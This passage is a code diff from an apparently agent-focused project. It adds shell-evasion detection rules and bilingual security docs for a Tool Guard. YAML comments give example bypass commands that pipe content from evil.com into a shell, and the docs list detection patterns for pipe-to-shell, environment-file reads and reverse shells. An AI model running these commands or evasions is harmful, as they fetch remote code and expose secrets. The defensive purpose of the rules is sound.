+    "Settings/Models/components/modals/ModelManageModal",
+    __mod125__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/OpenRouterFilterSection",
+    __mod126__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/ProviderConfigModal",
+    __mod127__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/RemoteModelManageModal",
+    __mod128__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/index",
+    __mod129__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/local-models/LocalModelRow",
+    __mod130__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/local-models/LocalRuntimePanel",
+    __mod131__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/local-models/shared",
+    __mod132__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/modals/testConnectionMessage",
+    __mod133__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/providerIcon",
+    __mod134__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/sections/LoadingState",
+    __mod135__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/sections/ModelsSection",
+    __mod136__,
+  );
+  moduleRegistry.register(
+    "Settings/Models/components/sections/index",
+    __mod137__,
+  );
   moduleRegistry.register("Settings/Models/index", __mod138__);
   moduleRegistry.register("Settings/Models/useProviders", __mod139__);
-  moduleRegistry.register("Settings/Security/components/FileGuardSection", __mod140__);
-  moduleRegistry.register("Settings/Security/components/PreviewModal", __mod141__);
+  moduleRegistry.register(
+    "Settings/Security/components/FileGuardSection",
+    __mod140__,
+  );
+  moduleRegistry.register(
+    "Settings/Security/components/PreviewModal",
+    __mod141__,
+  );
   moduleRegistry.register("Settings/Security/components/RuleModal", __mod142__);
   moduleRegistry.register("Settings/Security/components/RuleTable", __mod143__);
-  moduleRegistry.register("Settings/Security/components/SkillScannerSection", __mod144__);
+  moduleRegistry.register(
+    "Settings/Security/components/SkillScannerSection",
+    __mod144__,
+  );
   moduleRegistry.register("Settings/Security/components/index", __mod145__);
   moduleRegistry.register("Settings/Security/index", __mod146__);
   moduleRegistry.register("Settings/Security/useSkillScanner", __mod147__);
   moduleRegistry.register("Settings/Security/useToolGuard", __mod148__);
   moduleRegistry.register("Settings/SkillPool/builtinNotice", __mod149__);
-  moduleRegistry.register("Settings/SkillPool/components/BroadcastModal", __mod150__);
-  moduleRegistry.register("Settings/SkillPool/components/ImportBuiltinModal", __mod151__);
-  moduleRegistry.register("Settings/SkillPool/components/PoolSkillCard", __mod152__);
-  moduleRegistry.register("Settings/SkillPool/components/PoolSkillDrawer", __mod153__);
-  moduleRegistry.register("Settings/SkillPool/components/PoolSkillListItem", __mod154__);
-  moduleRegistry.register("Settings/SkillPool/components/SkillMeta", __mod155__);
-  moduleRegistry.register("Settings/SkillPool/components/SkillPoolListItem", __mod156__);
+  moduleRegistry.register(
+    "Settings/SkillPool/components/BroadcastModal",
+    __mod150__,
+  );
+  moduleRegistry.register(
+    "Settings/SkillPool/components/ImportBuiltinModal",
+    __mod151__,
+  );
+  moduleRegistry.register(
+    "Settings/SkillPool/components/PoolSkillCard",
+    __mod152__,
+  );
+  moduleRegistry.register(
+    "Settings/SkillPool/components/PoolSkillDrawer",
+    __mod153__,
+  );
+  moduleRegistry.register(
+    "Settings/SkillPool/components/PoolSkillListItem",
+    __mod154__,
+  );
+  moduleRegistry.register(
+    "Settings/SkillPool/components/SkillMeta",
+    __mod155__,
+  );
+  moduleRegistry.register(
+    "Settings/SkillPool/components/SkillPoolListItem",
+    __mod156__,
+  );
   moduleRegistry.register("Settings/SkillPool/components/index", __mod157__);
   moduleRegistry.register("Settings/SkillPool/index", __mod158__);
   moduleRegistry.register("Settings/SkillPool/useSkillPool", __mod159__);
-  moduleRegistry.register("Settings/TokenUsage/components/EmptyState", __mod160__);
-  moduleRegistry.register("Settings/TokenUsage/components/LoadingState", __mod161__);
+  moduleRegistry.register(
+    "Settings/TokenUsage/components/EmptyState",
+    __mod160__,
+  );
+  moduleRegistry.register(
+    "Settings/TokenUsage/components/LoadingState",
+    __mod161__,
+  );
   moduleRegistry.register("Settings/TokenUsage/components/index", __mod162__);
   moduleRegistry.register("Settings/TokenUsage/index", __mod163__);
-  moduleRegistry.register("Settings/VoiceTranscription/components/AudioModeCard", __mod164__);
-  moduleRegistry.register("Settings/VoiceTranscription/components/ProviderSelectCard", __mod165__);
-  moduleRegistry.register("Settings/VoiceTranscription/components/ProviderTypeCard", __mod166__);
-  moduleRegistry.register("Settings/VoiceTranscription/components/index", __mod167__);
+  moduleRegistry.register(
+    "Settings/VoiceTranscription/components/AudioModeCard",
+    __mod164__,
+  );
+  moduleRegistry.register(
+    "Settings/VoiceTranscription/components/ProviderSelectCard",
+    __mod165__,
+  );
+  moduleRegistry.register(
+    "Settings/VoiceTranscription/components/ProviderTypeCard",
+    __mod166__,
+  );
+  moduleRegistry.register(
+    "Settings/VoiceTranscription/components/index",
+    __mod167__,
+  );
   moduleRegistry.register("Settings/VoiceTranscription/index", __mod168__);
-  moduleRegistry.register("Settings/VoiceTranscription/useVoiceTranscription", __mod169__);
+  moduleRegistry.register(
+    "Settings/VoiceTranscription/useVoiceTranscription",
+    __mod169__,
+  );
 }

--- a/src/qwenpaw/security/tool_guard/rules/dangerous_shell_commands.yaml
+++ b/src/qwenpaw/security/tool_guard/rules/dangerous_shell_commands.yaml
@@ -189,11 +189,10 @@
 # =========================================================================
 # Shell Evasion & Obfuscation Detection Rules
 # =========================================================================
-# Ported from Claude Code's bashSecurity.ts BASH_SECURITY_CHECK_IDS.
 # These rules detect command obfuscation and evasion techniques that
 # attempt to hide malicious intent from regex-based detection.
 
-# ── IFS Injection (bashSecurity #11) ─────────────────────────────────
+# ── IFS Injection ─────────────────────────────────
 # $IFS expands to whitespace (space/tab/newline) and can be used to
 # split tokens in ways that bypass regex validation.
 # e.g., `curl$IFS"http://evil.com"|sh` bypasses word-boundary checks.
@@ -210,7 +209,7 @@
   description: "Command uses $IFS variable which could bypass security validation"
   remediation: "Reject commands containing IFS manipulation. Legitimate commands do not need to reference $IFS directly."
 
-# ── Control Characters (bashSecurity #17) ─────────────────────────────
+# ── Control Character ─────────────────────────────
 # Non-printable control characters (0x00-0x08, 0x0B-0x0C, 0x0E-0x1F,
 # 0x7F) have no legitimate use in shell commands. Bash silently drops
 # null bytes and ignores most control chars, so attackers can use them
@@ -227,7 +226,7 @@
   description: "Command contains non-printable control characters that could bypass security checks"
   remediation: "Block commands containing control characters. These are never needed in legitimate shell commands."
 
-# ── Unicode Whitespace (bashSecurity #18) ─────────────────────────────
+# ── Unicode Whitespace ─────────────────────────────
 # Unicode whitespace characters (NBSP, en/em space, ideographic space,
 # etc.) may be treated as word separators by some parsers but as literal
 # content by bash, creating parsing differentials that enable bypasses.
@@ -242,7 +241,7 @@
   description: "Command contains Unicode whitespace characters that could cause parsing inconsistencies"
   remediation: "Block commands containing non-ASCII whitespace. Use standard spaces instead."
 
-# ── /proc/environ Access (bashSecurity #13) ───────────────────────────
+# ── /proc/environ Access ───────────────────────────
 # /proc/*/environ files expose process environment variables including
 # API keys, secrets, and tokens. Defense-in-depth beyond path validation.
 - id: TOOL_CMD_PROC_ENVIRON
@@ -257,7 +256,7 @@
   description: "Command accesses /proc/*/environ which could expose sensitive environment variables"
   remediation: "Block access to process environment files. API keys and secrets may be exposed."
 
-# ── jq system() Function (bashSecurity #2) ────────────────────────────
+# ── jq system() Function ────────────────────────────
 # jq's system() function executes arbitrary shell commands, turning a
 # seemingly safe data-processing tool into an execution vector.
 # e.g., `jq -n 'system("curl evil.com | sh")'`
@@ -273,7 +272,7 @@
   description: "jq command contains system() function which can execute arbitrary shell commands"
   remediation: "Block jq commands using system(). Use jq only for data processing, not command execution."
 
-# ── jq Dangerous File Flags (bashSecurity #3) ─────────────────────────
+# ── jq Dangerous File Flags ─────────────────────────
 # Flags like -f/--from-file, --rawfile, --slurpfile, -L allow jq to
 # read arbitrary files or load external code libraries.
 - id: TOOL_CMD_JQ_FILE_FLAGS
@@ -288,7 +287,7 @@
   description: "jq command uses flags that could read arbitrary files or execute external code"
   remediation: "Confirm with user. These jq flags can access files outside the intended scope."
 
-# ── Zsh Dangerous Commands (bashSecurity #20) ─────────────────────────
+# ── Zsh Dangerous Commands ─────────────────────────
 # Zsh-specific builtins that can bypass security checks: zmodload loads
 # kernel modules enabling file I/O / network / pseudo-terminal access;
 # emulate -c is an eval-equivalent; zf_* are builtin file operations

--- a/website/public/docs/security.en.md
+++ b/website/public/docs/security.en.md
@@ -10,7 +10,7 @@ QwenPaw's security system consists of three core security layers:
 Security Architecture:
 ├─ Tool Guard — Runtime tool call protection
 │  Detects dangerous command patterns, injection attacks, and malicious operations
-│  using regex-based rules
+│  using YAML regex rules plus a quote-aware shell evasion guardian
 │
 ├─ File Guard — Sensitive file access control
 │  Blocks agent access to protected files and directories
@@ -24,7 +24,7 @@ Security Architecture:
 
 **Key concepts**:
 
-- **Tool Guard** inspects tool calls in real-time before execution, using regex rules to detect dangerous patterns
+- **Tool Guard** inspects tool calls in real-time before execution, using YAML regex rules and a dedicated shell evasion guardian to detect dangerous patterns
 - **File Guard** operates independently to protect sensitive files and directories from unauthorized access
 - **Skill Scanner** runs before skills are enabled to detect malicious code and security threats
 - **Web Authentication** (optional) controls access to the Console interface
@@ -37,15 +37,15 @@ The **Tool Guard** scans tool parameters **before** the agent invokes a tool, de
 
 ### How it works
 
-1. When the agent calls a tool, the Tool Guard inspects relevant parameters. Built-in regex rules primarily target **`execute_shell_command`**.
-2. Regex rules detect dangerous patterns, for example:
+1. When the agent calls a tool, the Tool Guard inspects relevant parameters. Checks primarily target **`execute_shell_command`**, combining built-in **YAML rules** (regex signatures) with **`ShellEvasionGuardian`** (quote-aware heuristics for obfuscation and parser differentials).
+2. Together they flag dangerous patterns, for example:
    - `rm -rf /` — Dangerous file deletion
    - SQL-injection-like fragments
    - Command substitution `$(...)` or `` `...` ``
    - Path traversal `../`
    - Privilege escalation `sudo`, `su`
-   - Reverse shells, fork bombs, etc.
-     (Exact coverage depends on built-in and custom rules.)
+   - Reverse shells, fork bombs, obfuscated flags, Unicode whitespace tricks, etc.
+   (Exact coverage depends on built-in and custom rules.)
 3. Each rule has an independent severity level (CRITICAL, HIGH, MEDIUM, LOW, INFO)
 4. For CRITICAL or HIGH findings: in the Console / interactive sessions, the tool call enters a pending-approval flow — you approve or reject before it runs. In non-interactive contexts without a session, findings are logged and execution may still proceed — use **`denied_tools`** to hard-block specific tools or tighten rules when needed.
 
@@ -186,10 +186,17 @@ Tool Guard includes the following built-in detection rules (for `execute_shell_c
 
 **Code Execution (CRITICAL/HIGH):**
 
-| Rule ID                    | Severity | Detection Target                    | Description                                       |
-| -------------------------- | -------- | ----------------------------------- | ------------------------------------------------- |
-| `TOOL_CMD_PIPE_TO_SHELL`   | CRITICAL | `curl/wget ... \| bash/sh` patterns | Downloads and immediately executes remote scripts |
-| `TOOL_CMD_OBFUSCATED_EXEC` | HIGH     | `base64 -d \| bash` patterns        | Executes base64-encoded commands                  |
+| Rule ID                       | Severity | Detection Target                                                                 | Description                                                                                    |
+| ----------------------------- | -------- | -------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------- |
+| `TOOL_CMD_PIPE_TO_SHELL`      | CRITICAL | `curl/wget ... \| bash/sh` patterns                                              | Downloads and immediately executes remote scripts                                              |
+| `TOOL_CMD_OBFUSCATED_EXEC`    | HIGH     | `base64 -d \| bash` patterns                                                     | Executes base64-encoded commands                                                             |
+| `TOOL_CMD_IFS_INJECTION`      | HIGH     | `$IFS`, `${...IFS...}`                                                           | Token splitting that can evade naive word-boundary checks                                      |
+| `TOOL_CMD_CONTROL_CHARS`      | CRITICAL | Non-printable control characters (for example NUL)                               | Characters that can hide metacharacters from simple scans                                      |
+| `TOOL_CMD_UNICODE_WHITESPACE` | HIGH     | NBSP, ideographic space, and other Unicode whitespace                            | Whitespace that parsers and Bash may treat differently                                         |
+| `TOOL_CMD_PROC_ENVIRON`       | HIGH     | `/proc/self/environ`, `/proc/<pid>/environ`                                      | Reads process environment blobs (secrets, tokens), often chained with execution or exfiltration |
+| `TOOL_CMD_JQ_SYSTEM`          | HIGH     | `jq` with `system(`                                                              | Shell execution embedded in jq programs                                                        |
+| `TOOL_CMD_JQ_FILE_FLAGS`      | HIGH     | `jq` `-f` / `--from-file`, `--rawfile`, `--slurpfile`, `-L`, `--library-path`    | Reading arbitrary files or loading external jq code paths                                        |
+| `TOOL_CMD_ZSH_DANGEROUS`      | HIGH     | `zmodload`, `emulate ... -c`, `sysopen` / `zpty` / `ztcp`, `zf_*`, `fc ... -e`    | zsh builtins that enable raw I/O, network, or execution paths beyond typical binary checks       |
 
 **Privilege Escalation (CRITICAL/HIGH):**
 
@@ -204,11 +211,27 @@ Tool Guard includes the following built-in detection rules (for `execute_shell_c
 | ------------------------ | ---------------------------------- | --------------------------------------------- |
 | `TOOL_CMD_REVERSE_SHELL` | `/dev/tcp`, `nc -e`, `socat EXEC:` | Establishes reverse shells or network tunnels |
 
+#### Shell evasion guardian
+
+The engine also runs **`ShellEvasionGuardian`** on `execute_shell_command`. It tracks quoting state to catch obfuscation that pure line- or regex-only checks can miss (for example command substitution outside single quotes, `$'...'` / `$"..."` tricks, backslash-escaped whitespace or shell operators—with a carve-out for common `find ... -exec ... {} \;`—raw newlines or `\r` that split commands while skipping heredocs, `#` comment / quote desync, and quoted newlines followed by `#`-looking lines). Reported rule IDs (severity **HIGH**):
+
+| Rule ID                               | Description                                                                 |
+| ------------------------------------- | --------------------------------------------------------------------------- |
+| `SHELL_EVASION_COMMAND_SUBSTITUTION`  | Backticks or command / process substitution–style patterns outside `'`...`'` |
+| `SHELL_EVASION_OBFUSCATED_FLAGS`      | ANSI-C or locale quoting, empty-quote flag tricks, or quoted flag tokens    |
+| `SHELL_EVASION_BACKSLASH_WHITESPACE`  | Backslash-escaped space or tab outside quotes                               |
+| `SHELL_EVASION_BACKSLASH_OPERATOR`    | Backslash before `; \| & < >` outside quotes                                |
+| `SHELL_EVASION_NEWLINE`               | Carriage return or unquoted newline before further command text             |
+| `SHELL_EVASION_COMMENT_QUOTE_DESYNC`  | Quote characters inside an unquoted `#` comment line                        |
+| `SHELL_EVASION_QUOTED_NEWLINE`        | Newline inside quotes where the next segment looks like a `#` comment line  |
+
+**Configuration note:** `disabled_rules` in `config.json` applies only to YAML rule IDs (typically `TOOL_CMD_*`). It does **not** disable `SHELL_EVASION_*` findings; turning off Tool Guard disables all guardians, including this one.
+
 **Usage recommendations**:
 
 - Keep CRITICAL level rules enabled; these represent the most dangerous operations
 - HIGH level rules can be adjusted based on actual use cases; some legitimate operations may trigger them
-- Use `disabled_rules` config to disable rules that don't apply to your use case
+- Use `disabled_rules` config to disable YAML `TOOL_CMD_*` rules that don't apply to your use case (`SHELL_EVASION_*` is always evaluated while Tool Guard is enabled)
 - Use `custom_rules` to add organization-specific security rules
 
 ---

--- a/website/public/docs/security.en.md
+++ b/website/public/docs/security.en.md
@@ -45,7 +45,7 @@ The **Tool Guard** scans tool parameters **before** the agent invokes a tool, de
    - Path traversal `../`
    - Privilege escalation `sudo`, `su`
    - Reverse shells, fork bombs, obfuscated flags, Unicode whitespace tricks, etc.
-   (Exact coverage depends on built-in and custom rules.)
+     (Exact coverage depends on built-in and custom rules.)
 3. Each rule has an independent severity level (CRITICAL, HIGH, MEDIUM, LOW, INFO)
 4. For CRITICAL or HIGH findings: in the Console / interactive sessions, the tool call enters a pending-approval flow — you approve or reject before it runs. In non-interactive contexts without a session, findings are logged and execution may still proceed — use **`denied_tools`** to hard-block specific tools or tighten rules when needed.
 
@@ -186,17 +186,17 @@ Tool Guard includes the following built-in detection rules (for `execute_shell_c
 
 **Code Execution (CRITICAL/HIGH):**
 
-| Rule ID                       | Severity | Detection Target                                                                 | Description                                                                                    |
-| ----------------------------- | -------- | -------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------- |
-| `TOOL_CMD_PIPE_TO_SHELL`      | CRITICAL | `curl/wget ... \| bash/sh` patterns                                              | Downloads and immediately executes remote scripts                                              |
-| `TOOL_CMD_OBFUSCATED_EXEC`    | HIGH     | `base64 -d \| bash` patterns                                                     | Executes base64-encoded commands                                                             |
-| `TOOL_CMD_IFS_INJECTION`      | HIGH     | `$IFS`, `${...IFS...}`                                                           | Token splitting that can evade naive word-boundary checks                                      |
-| `TOOL_CMD_CONTROL_CHARS`      | CRITICAL | Non-printable control characters (for example NUL)                               | Characters that can hide metacharacters from simple scans                                      |
-| `TOOL_CMD_UNICODE_WHITESPACE` | HIGH     | NBSP, ideographic space, and other Unicode whitespace                            | Whitespace that parsers and Bash may treat differently                                         |
-| `TOOL_CMD_PROC_ENVIRON`       | HIGH     | `/proc/self/environ`, `/proc/<pid>/environ`                                      | Reads process environment blobs (secrets, tokens), often chained with execution or exfiltration |
-| `TOOL_CMD_JQ_SYSTEM`          | HIGH     | `jq` with `system(`                                                              | Shell execution embedded in jq programs                                                        |
-| `TOOL_CMD_JQ_FILE_FLAGS`      | HIGH     | `jq` `-f` / `--from-file`, `--rawfile`, `--slurpfile`, `-L`, `--library-path`    | Reading arbitrary files or loading external jq code paths                                        |
-| `TOOL_CMD_ZSH_DANGEROUS`      | HIGH     | `zmodload`, `emulate ... -c`, `sysopen` / `zpty` / `ztcp`, `zf_*`, `fc ... -e`    | zsh builtins that enable raw I/O, network, or execution paths beyond typical binary checks       |
+| Rule ID                       | Severity | Detection Target                                                               | Description                                                                                     |
+| ----------------------------- | -------- | ------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------- |
+| `TOOL_CMD_PIPE_TO_SHELL`      | CRITICAL | `curl/wget ... \| bash/sh` patterns                                            | Downloads and immediately executes remote scripts                                               |
+| `TOOL_CMD_OBFUSCATED_EXEC`    | HIGH     | `base64 -d \| bash` patterns                                                   | Executes base64-encoded commands                                                                |
+| `TOOL_CMD_IFS_INJECTION`      | HIGH     | `$IFS`, `${...IFS...}`                                                         | Token splitting that can evade naive word-boundary checks                                       |
+| `TOOL_CMD_CONTROL_CHARS`      | CRITICAL | Non-printable control characters (for example NUL)                             | Characters that can hide metacharacters from simple scans                                       |
+| `TOOL_CMD_UNICODE_WHITESPACE` | HIGH     | NBSP, ideographic space, and other Unicode whitespace                          | Whitespace that parsers and Bash may treat differently                                          |
+| `TOOL_CMD_PROC_ENVIRON`       | HIGH     | `/proc/self/environ`, `/proc/<pid>/environ`                                    | Reads process environment blobs (secrets, tokens), often chained with execution or exfiltration |
+| `TOOL_CMD_JQ_SYSTEM`          | HIGH     | `jq` with `system(`                                                            | Shell execution embedded in jq programs                                                         |
+| `TOOL_CMD_JQ_FILE_FLAGS`      | HIGH     | `jq` `-f` / `--from-file`, `--rawfile`, `--slurpfile`, `-L`, `--library-path`  | Reading arbitrary files or loading external jq code paths                                       |
+| `TOOL_CMD_ZSH_DANGEROUS`      | HIGH     | `zmodload`, `emulate ... -c`, `sysopen` / `zpty` / `ztcp`, `zf_*`, `fc ... -e` | zsh builtins that enable raw I/O, network, or execution paths beyond typical binary checks      |
 
 **Privilege Escalation (CRITICAL/HIGH):**
 
@@ -215,15 +215,15 @@ Tool Guard includes the following built-in detection rules (for `execute_shell_c
 
 The engine also runs **`ShellEvasionGuardian`** on `execute_shell_command`. It tracks quoting state to catch obfuscation that pure line- or regex-only checks can miss (for example command substitution outside single quotes, `$'...'` / `$"..."` tricks, backslash-escaped whitespace or shell operators—with a carve-out for common `find ... -exec ... {} \;`—raw newlines or `\r` that split commands while skipping heredocs, `#` comment / quote desync, and quoted newlines followed by `#`-looking lines). Reported rule IDs (severity **HIGH**):
 
-| Rule ID                               | Description                                                                 |
-| ------------------------------------- | --------------------------------------------------------------------------- |
-| `SHELL_EVASION_COMMAND_SUBSTITUTION`  | Backticks or command / process substitution–style patterns outside `'`...`'` |
-| `SHELL_EVASION_OBFUSCATED_FLAGS`      | ANSI-C or locale quoting, empty-quote flag tricks, or quoted flag tokens    |
-| `SHELL_EVASION_BACKSLASH_WHITESPACE`  | Backslash-escaped space or tab outside quotes                               |
-| `SHELL_EVASION_BACKSLASH_OPERATOR`    | Backslash before `; \| & < >` outside quotes                                |
-| `SHELL_EVASION_NEWLINE`               | Carriage return or unquoted newline before further command text             |
-| `SHELL_EVASION_COMMENT_QUOTE_DESYNC`  | Quote characters inside an unquoted `#` comment line                        |
-| `SHELL_EVASION_QUOTED_NEWLINE`        | Newline inside quotes where the next segment looks like a `#` comment line  |
+| Rule ID                              | Description                                                                  |
+| ------------------------------------ | ---------------------------------------------------------------------------- |
+| `SHELL_EVASION_COMMAND_SUBSTITUTION` | Backticks or command / process substitution–style patterns outside `'`...`'` |
+| `SHELL_EVASION_OBFUSCATED_FLAGS`     | ANSI-C or locale quoting, empty-quote flag tricks, or quoted flag tokens     |
+| `SHELL_EVASION_BACKSLASH_WHITESPACE` | Backslash-escaped space or tab outside quotes                                |
+| `SHELL_EVASION_BACKSLASH_OPERATOR`   | Backslash before `; \| & < >` outside quotes                                 |
+| `SHELL_EVASION_NEWLINE`              | Carriage return or unquoted newline before further command text              |
+| `SHELL_EVASION_COMMENT_QUOTE_DESYNC` | Quote characters inside an unquoted `#` comment line                         |
+| `SHELL_EVASION_QUOTED_NEWLINE`       | Newline inside quotes where the next segment looks like a `#` comment line   |
 
 **Configuration note:** `disabled_rules` in `config.json` applies only to YAML rule IDs (typically `TOOL_CMD_*`). It does **not** disable `SHELL_EVASION_*` findings; turning off Tool Guard disables all guardians, including this one.
 

--- a/website/public/docs/security.zh.md
+++ b/website/public/docs/security.zh.md
@@ -9,7 +9,7 @@ QwenPaw 的安全系统由三个核心安全层组成:
 ```
 安全架构:
 ├─ 工具守卫 (Tool Guard) — 运行时工具调用检测
-│  基于正则表达式检测危险命令模式、注入攻击和恶意操作
+│  基于 YAML 正则规则与引号感知的 Shell 规避守卫检测危险命令、注入与恶意操作
 │
 ├─ 文件防护 (File Guard) — 敏感文件访问控制
 │  阻止 Agent 访问受保护的文件和目录
@@ -22,7 +22,7 @@ QwenPaw 的安全系统由三个核心安全层组成:
 
 **核心概念**:
 
-- **工具守卫** 在执行前实时检查工具调用，使用正则规则检测危险模式
+- **工具守卫** 在执行前实时检查工具调用，结合 YAML 正则规则与专用的 Shell 规避守卫检测危险模式
 - **文件防护** 独立运行，保护敏感文件和目录免受未授权访问
 - **技能扫描器** 在技能启用前运行，检测恶意代码和安全威胁
 - **Web 登录认证** (可选) 控制对控制台界面的访问
@@ -35,15 +35,15 @@ QwenPaw 的安全系统由三个核心安全层组成:
 
 ### 工作原理
 
-1. 当 Agent 调用工具时,工具守卫会检查相关参数。内置正则规则主要针对 **`execute_shell_command`**。
-2. 使用正则表达式规则检测危险模式,例如:
+1. 当 Agent 调用工具时,工具守卫会检查相关参数。检测主要针对 **`execute_shell_command`**：内置 **YAML 规则**(正则签名)与 **`ShellEvasionGuardian`**(针对混淆与解析差异的引号状态分析)。
+2. 二者共同识别危险模式,例如:
    - `rm -rf /` — 危险的文件删除
    - SQL 注入相关片段
-   - 命令替换 `$(...)` 或 `` `...` ``
+   - 命令替换 `$(...)` 或 `` `...` ``(Shell 规避守卫还会在单引号外分析此类模式)
    - 路径遍历 `../`
    - 特权提升 `sudo`、`su`
-   - 反向 Shell、Fork 炸弹等
-     (具体覆盖范围以内置规则与自定义规则为准。)
+   - 反向 Shell、Fork 炸弹、标志位混淆、Unicode 空白绕过等
+     (具体覆盖范围以内置 YAML 规则、Shell 规避守卫与自定义规则为准。)
 3. 每条规则有独立的严重级别(CRITICAL、HIGH、MEDIUM、LOW、INFO)
 4. 当发现 CRITICAL 或 HIGH 级别问题时:在控制台等带会话的交互环境中,工具调用会进入待审批流程,由你选择批准或拒绝;在无会话上下文的场景下,发现会记入日志,调用仍可能继续执行 — 若需更严格限制,可使用 `denied_tools` 禁止特定工具或调整规则。
 
@@ -184,10 +184,17 @@ QwenPaw 的安全系统由三个核心安全层组成:
 
 **代码执行（CRITICAL/HIGH）：**
 
-| 规则 ID                    | 严重级别 | 检测目标                        | 说明                   |
-| -------------------------- | -------- | ------------------------------- | ---------------------- |
-| `TOOL_CMD_PIPE_TO_SHELL`   | CRITICAL | `curl/wget ... \| bash/sh` 模式 | 下载并立即执行远程脚本 |
-| `TOOL_CMD_OBFUSCATED_EXEC` | HIGH     | `base64 -d \| bash` 模式        | 执行 base64 编码的命令 |
+| 规则 ID                       | 严重级别 | 检测目标                                                                               | 说明                                                                                         |
+| ----------------------------- | -------- | -------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------- |
+| `TOOL_CMD_PIPE_TO_SHELL`      | CRITICAL | `curl/wget ... \| bash/sh` 模式                                                        | 下载并立即执行远程脚本                                                                     |
+| `TOOL_CMD_OBFUSCATED_EXEC`    | HIGH     | `base64 -d \| bash` 模式                                                               | 执行 base64 编码的命令                                                                     |
+| `TOOL_CMD_IFS_INJECTION`      | HIGH     | `$IFS`、`${...IFS...}`                                                                 | 利用字段分隔符拆分 token,绕过简单词边界类检测                                              |
+| `TOOL_CMD_CONTROL_CHARS`      | CRITICAL | 不可见控制字符(含 NUL 等)                                                              | 可能在简单扫描下隐藏元字符                                                                 |
+| `TOOL_CMD_UNICODE_WHITESPACE` | HIGH     | NBSP、表意空格等 Unicode 空白                                                          | 解析器与 Bash 对空白处理不一致时的绕过面                                                   |
+| `TOOL_CMD_PROC_ENVIRON`       | HIGH     | `/proc/self/environ`、`/proc/<pid>/environ`                                           | 读取进程环境块(密钥、令牌),常与执行或外泄链配合                                            |
+| `TOOL_CMD_JQ_SYSTEM`          | HIGH     | 含 `system(` 的 `jq`                                                                   | 在 jq 程序中嵌入 Shell 执行                                                                |
+| `TOOL_CMD_JQ_FILE_FLAGS`      | HIGH     | `jq` 的 `-f`/`--from-file`、`--rawfile`、`--slurpfile`、`-L`、`--library-path`         | 任意读文件或加载外部 jq 代码路径                                                           |
+| `TOOL_CMD_ZSH_DANGEROUS`      | HIGH     | `zmodload`、`emulate ... -c`、`sysopen`/`zpty`/`ztcp`、`zf_*`、`fc ... -e` 等          | zsh 内建提供的原始 I/O、网络或执行能力,绕过常见路径型检查                                    |
 
 **权限提升（CRITICAL/HIGH）：**
 
@@ -202,11 +209,27 @@ QwenPaw 的安全系统由三个核心安全层组成:
 | ------------------------ | ---------------------------------- | ------------------------- |
 | `TOOL_CMD_REVERSE_SHELL` | `/dev/tcp`、`nc -e`、`socat EXEC:` | 建立反向 Shell 或网络隧道 |
 
+#### Shell 规避守卫
+
+引擎还会对 `execute_shell_command` 运行 **`ShellEvasionGuardian`**。它维护引号状态,弥补仅靠行级或纯正则易漏的混淆(例如单引号外的命令替换、`` ` ``、`$()`、Zsh 形式、`$'...'`/`$"..."` 技巧、反斜杠转义的空白或 shell 操作符——对常见 `find ... -exec ... {} \;` 有例外——可能拆分命令的裸换行或 `\r` 且跳过 heredoc、`#` 注释与引号状态不同步、引号内换行后接看似注释的行等)。上报的规则 ID(严重级别均为 **HIGH**):
+
+| 规则 ID                               | 说明                                                         |
+| ------------------------------------- | ------------------------------------------------------------ |
+| `SHELL_EVASION_COMMAND_SUBSTITUTION`  | 单引号 `'`...`'` 外的反引号或命令/进程替换类写法             |
+| `SHELL_EVASION_OBFUSCATED_FLAGS`      | ANSI-C/区域化引号、空引号标志位技巧或引号包裹的标志片段      |
+| `SHELL_EVASION_BACKSLASH_WHITESPACE`  | 引号外对空格或制表符的反斜杠转义                           |
+| `SHELL_EVASION_BACKSLASH_OPERATOR`    | 引号外对 `; \| & < >` 前加反斜杠                           |
+| `SHELL_EVASION_NEWLINE`               | 回车或未在引号内且后跟更多命令文本的换行                   |
+| `SHELL_EVASION_COMMENT_QUOTE_DESYNC`  | 未在引号内的 `#` 注释行中出现引号字符,干扰引号跟踪         |
+| `SHELL_EVASION_QUOTED_NEWLINE`        | 引号内换行且后续片段形如 `#` 注释行                        |
+
+**配置说明:** `config.json` 中的 `disabled_rules` 仅作用于 YAML 规则 ID(一般为 `TOOL_CMD_*`),**不会**关闭 `SHELL_EVASION_*`;关闭工具守卫会一并停用所有守卫(含本守卫)。
+
 **使用建议**:
 
 - CRITICAL 级别规则建议保持启用,这些是最危险的操作
 - HIGH 级别规则可根据实际使用场景调整,某些合法操作可能触发
-- 可通过 `disabled_rules` 配置禁用不适用的规则
+- 可通过 `disabled_rules` 禁用不适用的 YAML `TOOL_CMD_*` 规则(工具守卫开启时仍会评估 `SHELL_EVASION_*`)
 - 可通过 `custom_rules` 添加组织特定的安全规则
 
 ---

--- a/website/public/docs/security.zh.md
+++ b/website/public/docs/security.zh.md
@@ -184,17 +184,17 @@ QwenPaw 的安全系统由三个核心安全层组成:
 
 **代码执行（CRITICAL/HIGH）：**
 
-| 规则 ID                       | 严重级别 | 检测目标                                                                               | 说明                                                                                         |
-| ----------------------------- | -------- | -------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------- |
-| `TOOL_CMD_PIPE_TO_SHELL`      | CRITICAL | `curl/wget ... \| bash/sh` 模式                                                        | 下载并立即执行远程脚本                                                                     |
-| `TOOL_CMD_OBFUSCATED_EXEC`    | HIGH     | `base64 -d \| bash` 模式                                                               | 执行 base64 编码的命令                                                                     |
-| `TOOL_CMD_IFS_INJECTION`      | HIGH     | `$IFS`、`${...IFS...}`                                                                 | 利用字段分隔符拆分 token,绕过简单词边界类检测                                              |
-| `TOOL_CMD_CONTROL_CHARS`      | CRITICAL | 不可见控制字符(含 NUL 等)                                                              | 可能在简单扫描下隐藏元字符                                                                 |
